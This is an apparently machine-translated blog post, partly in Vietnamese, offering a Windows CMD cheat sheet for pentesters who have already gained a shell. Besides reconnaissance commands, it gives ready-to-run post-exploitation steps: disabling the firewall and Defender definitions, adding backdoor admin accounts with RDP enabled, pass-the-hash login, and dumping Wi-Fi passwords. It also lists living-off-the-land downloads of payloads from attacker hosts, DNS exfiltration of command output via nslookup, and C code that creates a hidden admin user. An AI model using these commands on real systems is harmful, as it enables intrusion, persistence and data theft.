In this article, I will list the most common and basic CMD commands that Windows pentesters often use. Because this article is very technical in nature, I will not explain those commands in detail. But only briefly about the effect of the command. If you cannot use any command, then 1 is that you entered the wrong syntax, 2 is that the command is not installed on the system so it cannot be used.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
System-related CMD commands for Pentester
First of all, why when hacking into Windows you need to know these basic commands. Because once you have enabled Shell on Windows, the next thing you need to do is turn off the Firewall, create a backup User for later Login again…
So mastering the commands below the Pentester will save more time when exploiting Windows vulnerabilities.
Version and patch information
View system architecture: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
Full system information: systeminfo
View OS name and version: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
View patch: wmic qfe get Caption,Description,HotFixID,InstalledOn
Hostname: hostname
View third-party drivers: DRIVERQUERY
Environment
List all environment variables: set
Some env variables to know:
- COMPUTERNAME: Computer name
- TEMP/TMP: Temp folder (save temporary files)
- USERNAME: Username
- HOMEPATH/USERPROFILE: Home Links
- windir: C:\Windows
- LOGONSERVER: Name of domain controller
- USERDNSDOMAIN: Domain using DNS
- USERDOMAIN: Domain Name
DNS request for PC: nslookup %LOGONSERVER%.%USERDNSDOMAIN%
Drive is connected
wmic logicaldisk get caption 2
wmic logicaldisk get caption,description,providername
Anti Virus
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
sc query windefend
Delete the privacy rules of Defender
(intentional for machines without internet): "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Recycle Bin
dir C:\$Recycle.Bin /s /b
Processes, Services & Software
Details of scheduled tasks:
schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
List of processes: tasklist /V
Processes that enable services: tasklist /SVC
Active Windows Services: net start
List of services: wmic service list brief
or sc query
Installed 64bit software: dir /a “C:\Program Files”
Installed 32bit softwares: dir /a "C:\Program Files (x86)"
Installed software: reg query HKEY_LOCAL_MACHINE\SOFTWARE
Domain Information
echo %USERDOMAIN% #Tên Domain
echo %USERDNSDOMAIN% #Tên Domain khi máy tính có đăng nhập vào Domain
echo %logonserver% #Tên domain controller
set logonserver #Tên domain controller
set log #Tên domain controller
net groups /domain #Danh sách domain group
net group "domain computers" /domain #Danh sách PC đã kết nối với domain
net view /domain #Danh sách PC của domain
nltest /dclist:<DOMAIN> #Danh sách domain controllers
net group "Domain Controllers" /domain #Danh sách tài khoản PC của domains controllers
net group "Domain Admins" /domain #Danh sách user có đặc quyền quản trị domain
net localgroup administrators /domain #Danh sách các admin group bên trong domain (bao gồm cả group "Domain Admins")
net user /domain #Danh sách tất cả user của domain
net user <ACCOUNT_NAME> /domain #Thông tin về user
net accounts /domain #View the domain’s current password and login limit
nltest /domain_trust #Mapping domain relationships
Logs & Events
Make a security query using the credentials: wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
Users & Groups
Users
whoami /all #Tất cả thông tin về bạn
whoami /priv #Show only privilegesnet users #Tất cả các user
dir /b /ad "C:\Users"
net user %username% #Thông tin về user (bạn)
net accounts #Thông tin về mật khẩu
qwinsta #Có ai khác đã đăng nhập không?
cmdkey /list #Danh sách các chứng chỉ
net user /add [username] [password] #Tạo user
#Mở cmd.exe mới với các creds mới (để mạo danh trong mạng)
runas /netonly /user:<USERNAME>\administrator cmd
here#Kiểm tra phiên đăng nhập hiện tại với tư cách là quản trị viên bằng cách sử dụng phiên đăng nhập từ sysinternals. Đọc thêm
logonsessions.exe
logonsessions64.exe
Groups
#Local
net localgroup #All groups existnet localgroup Administrators #Thông tin về group group (admins)
net localgroup administrators [username] /add #Thêm người dùng vào administrators
#Domain
net group /domain #Thông tin về group domain
net group /domain <domain_group_name> #Người dùng thuộc group
List of sessions
qwinsta
klist sessions
Password Policy
net accounts
Add users to the group
# Thêm user domain vào Group Domain Admins
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Thêm local user vào group local Admins
net user username password /ADD
net localgroup Administrators username /ADD
# Thêm user vào các group khác:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
Network
Interfaces, Routes, Ports, Hosts and DNSCache
ipconfig /all #Thông tin về interfaces
route print #Xem các routes hiện cóó
arp -a #Thông tin về host
netstat -ano #Các port đang mởở
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
Firewall
Information about the firewall and open ports:
netsh firewall show state
netsh advfirewall firewall show rule name=all
netsh firewall show config # Thông tin firewall
Netsh Advfirewall show allprofiles
Turn off and on the firewall:
NetSh Advfirewall set allprofiles state off #Tắt Firewall
NetSh Advfirewall set allprofiles state on #Bật Firewall
netsh firewall set opmode disable #Tắt firewall
How to open ports:
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
Enable Remote Desktop:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #Không cần thiết
::sc config TermService start= auto #Unnecessary::net start Termservice #Không cần thiết
Turn on Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
Ninja combo (new admin user, allow RDP + Rassistance + Firewall)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup “Remote Desktop Users” hacker /add & reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add “ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 “Remote Desktop” & netsh firewall set service remoteadmin enable
Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
Share
net view #Lấy danh sách máy tính
net view /all /domain [domainname] #Shares trên domains
net view \\computer /ALL #danh sách máy tính tham gia share
net use x: \\computer\share #Kết nối ổ với share
net share #Check current share
WIFI
netsh wlan show profile #Xem SSID của wifi từng kết nối
netsh wlan show profile <SSID> key=clear #Xem mật khẩu wifi
SNMP
Read this article to know what is SNMP?
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Network Interfaces
ipconfig /all
ARP
arp -A
Download
Bitsadmin.exe
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
CertReq.exeCertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Certutil.execertutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
Desktopimgdownldr.exeset "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Diantz.exe
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Esentutl.exe
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Expand.exe
expand \\webdav\folder\file.bat c:\ADS\file.bat
Extract32.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Findstr.exe
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Ftp.exe
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
GfxDownloadWrapper.exe
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Hh.exe
HH.exe http://some.url/script.ps1
ieexec.exe
ieexec.exe http://x.x.x.x:8080/bypass.exe
Makecab.exe
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
MpCmdRun.exe
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
Replace.exe
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Excel.exe
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Powerpnt.exe
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Squirrel.exe
squirrel.exe --download [url to package]
Update.exe
Update.exe --download [url to package]
Winword.exe
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Wsl.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Misc
cd #Đường dẫn hiện tại
cd folder #Truy cập vào thư mục
dir #Danh sách các thư mục và file trong đường dẫn hiện tại
dir /a:h *path #Danh sách các file ẩn
dir /s /b #Tất cả đường dẫn trong
time #Thời gian hiện tại
date #Ngày hiện tại
shutdown /r /t 0 #Tắt máy tính ngay lập tức
type <file> #Đọc file
Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
Hide files
attrib +h file #Bật ẩn file
attrib -h file #Tắt ẩn file
Gives full control over the files you have
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Xóa quyền
Recursively copy filesxcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
ADS (What is ADS?)
dir /r #Phát hiện ADS
more file.txt:ads.txt #Đọc ADS
powershell (Get-Content file.txt -Stream ads.txt)
Listen to the ACLs . address
You can listen http://+:80/Temporary_Listen_Addresses/ without admin rightsnetsh http show urlacl
DNS shell
You use one of the following 2 options:
sudo responder -I <iface> #Active sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
Victim
Skill for /f tokens _**_: Lets me execute the command, taking the first X word of each line and sending it via DNS to my server.
for /f %a in ('whoami') do nslookup %a <IP_kali> for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #Danh sách thư mục for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #Liệt kê các thư mục đó for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Giống lệnh trước đó #More complex commands for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Giống lệnh trước đó
You can also redirect the output and then read it.
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
Calling CMD from code C
#include <stdlib.h> // Khi file được thực thi bởi Admin, chương trình này sẽ tạo một user và sau đó thêm user đó vào nhóm Admin // i686-w64-mingw32-gcc addmin.c -o addmin.exe // upx -9 addmin.exe int main (){ int i; i=system("net users otherAcc 0TherAcc! /add"); i=system("net localgroup administrators otherAcc /add"); return 0; }
The above are the basic pentest cmd commands for Windows, those who want to learn more about pentester can go to Anonyviet’s new Discord server Please.